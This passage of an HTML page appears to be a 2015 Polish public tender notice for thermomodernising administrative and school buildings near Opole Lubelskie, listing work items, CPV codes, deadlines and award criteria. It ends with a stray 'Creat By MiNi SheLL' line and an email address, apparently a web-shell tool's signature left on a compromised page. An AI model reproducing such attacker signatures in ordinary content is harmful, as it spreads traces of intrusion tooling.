4. Wykonanie ocieplenia ścian zewnętrznych przedsionka wraz z obróbkami styropianem grubości 15 cm o powierzchni 29,34 m2;
5. Wykonanie ocieplenia stropodachu niewentylowanego przy zastosowaniu granulatu z wełny mineralnej grubości 22 cm o powierzchni 179,93 m2;
6. Wykonanie ocieplenia stropu pod nieogrzewanym poddaszem wełną mineralną grubości 22 cm o powierzchni 388,89 m2;
7. Wymiana stolarki okiennej na nową drewnianą wraz z nawiewnikami higrosterowanymi 44 szt.;
8. Wymiana instalacji centralnego ogrzewania na nową wraz z zaworami termostatycznymi 38 szt.;
9. Wykonanie pokrycia z papy termozgrzewalnej 214,76 m2;
10. Wykonanie konstrukcji i pokrycia z blachy powlekanej 396,63 m2;
11. Wykonanie ocieplenia ścian piwnic z polistyrenu ekstrudowanego XPS grubości 10 cm 49,25 m2;
12. Wykonanie instalacji odgromowej 1 kpl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.32.00.00-6, 45.42.11.00-5, 45.33.11.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Termomodernizacja budynku administracyjnego położonego przy ul. Przemysłowa 4a w Opolu Lubelskim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Wykonanie ocieplenia ścian zewnętrznych podziemia (ściany piwnic wyniesione ponad gruntem) oraz ścian zewnętrznych nadziemia wraz z obróbkami, styropianem grubości 12 cm o powierzchni 720,46 m2;
2. Wykonanie ocieplenia ścian zewnętrznych piwnic zagłębionych w gruncie, wraz z wykonaniem wykopu odgrzybieniem ścian i wykonaniem izolacji przeciwwilgociowej, styrodurem grubości 10 cm 141,51 m2;
3. Wykonanie ocieplenia stropu nad pomieszczeniami ogrzewanymi wełną mineralną grubości 23 cm o powierzchni 171,66 m2;
4. Wykonanie ocieplenia stropu pod nieogrzewanym poddaszem wełną mineralną grubości 23 cm wraz z zabezpieczeniem wełny płytą osb  o powierzchni 93,6 m2;
5. Wymiana stolarki okiennej na nową z PCV wraz z nawiewnikami higrosterowanymi 81 szt.;
6. Wymiana stolarki drzwiowej na aluminiową 5 szt.;
7. Wymiana drzwi wewnętrznych pomiędzy przestrzenią ogrzewaną i nieogrzewaną na drewniane 2 szt.;
8. Wymiana instalacji centralnego ogrzewania na nową wraz z zaworami termostatycznymi 84 szt.;
9. Wymiana istniejącego kotła na gazowe kotły kondensacyjne o mocy 85 kW 2 szt.;
10. Wykonanie instalacji odgromowej 1kpl.;
11. Odtworzenie schodów zewnętrznych z kostki brukowej o grubości 6 cm 14,62 m2;
12. Wykonanie ocieplenia ściany wewnętrznej styropianem grubości 10 cm o powierzchni 144,75 m2;
13. Wykonanie remontu płyt balkonowych wraz z wykonaniem posadzki o powierzchni 79,2 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.32.00.00-6, 45.42.10.00-4, 45.33.11.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Termomodernizacja budynku administracyjnego położonego przy ul. Lubelska 4  w Opolu Lubelskim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Wykonanie ocieplenia ścian zewnętrznych styropianem grubości 14 cm o powierzchni 1152,58 m2;
2. Wykonanie docieplenia stropodachu dodatkową warstwą wełny mineralnej przy zastosowaniu granulowanej wełny mineralnej grubości 14 cm 444,29 m2;
3. Wymiana stolarki okiennej na nową z PCV wraz z nawiewnikami higrosterowanymi 15 szt.;
4. Wymiana kotła na nowy gazowy niskotemperaturowy kocioł kondensacyjny o mocy 130 kW1 szt.;
5. Wykonanie instalacji odgromowej 1kpl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.32.00.00-6, 45.42.10.00-4, 45.33.10.10-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Termomodernizacja budynków szkolnych Specjalnego Ośrodka Szkolno - Wychowawczego w Karczmiskach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje:
1. budynek zaplecza warsztatów z następującym zakresem robót:
1) Wykonanie ocieplenia ścian zewnętrznych styropianem grubości 15 cm o powierzchni 514,13 m2;
2) Wykonanie ocieplenia stropodachu wentylowanego granulatem z wełny mineralnej grubości 16 cm o powierzchni 170,5 m2;
3) Wymiana instalacji centralnego ogrzewania na nową wyposażoną w zawory termostatyczne 34 szt.;
4) Wymiana stolarki okiennej na nową z PCV wraz z nawiewnikami higrosterowanymi  35 szt.;
5) Wymiana stolarki drzwiowej na aluminiową 1 szt.;
6) Wykonanie instalacji odgromowej 1kpl.;
7) Wykonanie opaski z kostki brukowej betonowej 31,31 m2;
2. budynek warsztatów - hala A z następującym zakresem robót:
1) Wykonanie ocieplenia ścian zewnętrznych styropianem grubości 15 cm o powierzchni 282,75 m2;
2) Wykonanie ocieplenia dachu poprzez zdjęcie istniejącego pokrycia i ułożenie płyt warstwowych z rdzeniem poliuretanowym o grubości 16 cm 415,64 m2;
3) Wymiana instalacji centralnego ogrzewania na nową wyposażoną w zawory termostatyczne 19 szt.;
4) Wymiana stolarki okiennej na nową z PCV 20 szt.;
5) Wymiana stolarki drzwiowej na aluminiową 5 szt.;
6) Wykonanie opaski z kostki brukowej betonowej o powierzchni 54,83 m2;
7) Wykonaniu instalacji odgromowej 1kpl.;
3. budynek warsztatów - hala B z następującym zakresem robót:
1) Wykonanie ocieplenia ścian zewnętrznych styropianem grubości 15 cm o powierzchni 228,83 m2;
2) Wykonanie ocieplenia dachu poprzez zdjęcie istniejącego pokrycia i ułożenie płyt warstwowych z rdzeniem poliuretanowym o grubości 16 cm 340,84 m2;
3) Wymiana instalacji centralnego ogrzewania na nową wyposażoną w zawory termostatyczne 15 szt.;
4) Wymiana stolarki okiennej na nową z PCV 15 szt.;
5) Wymiana stolarki drzwiowej na aluminiową 2 szt.;
6) Wykonanie opaski z kostki brukowej betonowej 51,44 m2;
7) Wykonaniu instalacji odgromowej 1kpl.;
4. budynku przy zapleczu sanitarno-socjalnym Orlik z następującym zakresem robót:
1) Wykonanie ocieplenia ścian zewnętrznych wraz z obróbkami blacharskimi styropianem grubości 15 cm o powierzchni 243,01 m2;
2) Wykonanie ocieplenia stropodachu wentylowanego granulatem z wełny mineralnej o grubości 23 cm o powierzchni 363,30 m2;
3) Wymiana stolarki okiennej na nową z PCV 20 szt.;
4) Wymiana stolarki drzwiowej na aluminiową 2 szt.;
5) Wymiana instalacji centralnego ogrzewania na nową wraz z wymianą pomp pomocniczych wyposażoną w zawory termostatyczne 17 szt.;
6) Wykonanie instalacji odgromowej 1 kpl.;
7) Wykonaniu opaski z kostki brukowej betonowej o powierzchni 62,67 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.32.00.00-6, 45.42.10.00-4, 45.33.11.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Termomodernizacja budynku warsztatów Zespołu Szkół w Poniatowej przy ul Fabrycznej 16C.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Ocieplenie przegród budynku ściany zewnętrzne podziemia (ściany piwnic nie osłonięte gruntem) przy zastosowaniu płyt z polistyrenu ekstrudowanego XPS jako materiału izolacyjnego o grubości 15 cm o powierzchni 9,25 m2;
2. Wykonanie ocieplenia ścian zewnętrznych nadziemia styropianem o grubości 15 cm o powierzchni 703,69 m2, wraz z niezbędnymi obróbkami oraz z częściową likwidacją okien;
3. Wykonanie ocieplenia stropodachu wraz z ułożeniem pokrycia dachowego z papy oraz naprawą uszkodzeń izolacji, styropapą o grubości 23 cm o powierzchni 1950,61 m2;
4. Wymiana stolarki okiennej na PCV wraz z nawiewnikami higrosterowanymi 292,34 m2;
5. Wymiana stolarki drzwiowej na aluminiową 60,62m2;
6. Wymiana instalacji centralnego ogrzewania na nową wyposażoną w grzejniki wraz z zaworami termostatycznymi 60 szt.;
7. Wykonanie docieplenia stropu piwnicy wełną mineralną grubości 12 cm o powierzchni 71,62 m2;
8. Wykonanie instalacji odgromowej 1kpl.;
9. Wykonanie opaski z kostki brukowej o powierzchni 92,45 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.32.00.00-6, 45.42.10.00-4, 45.33.11.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. okres gwarancji - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com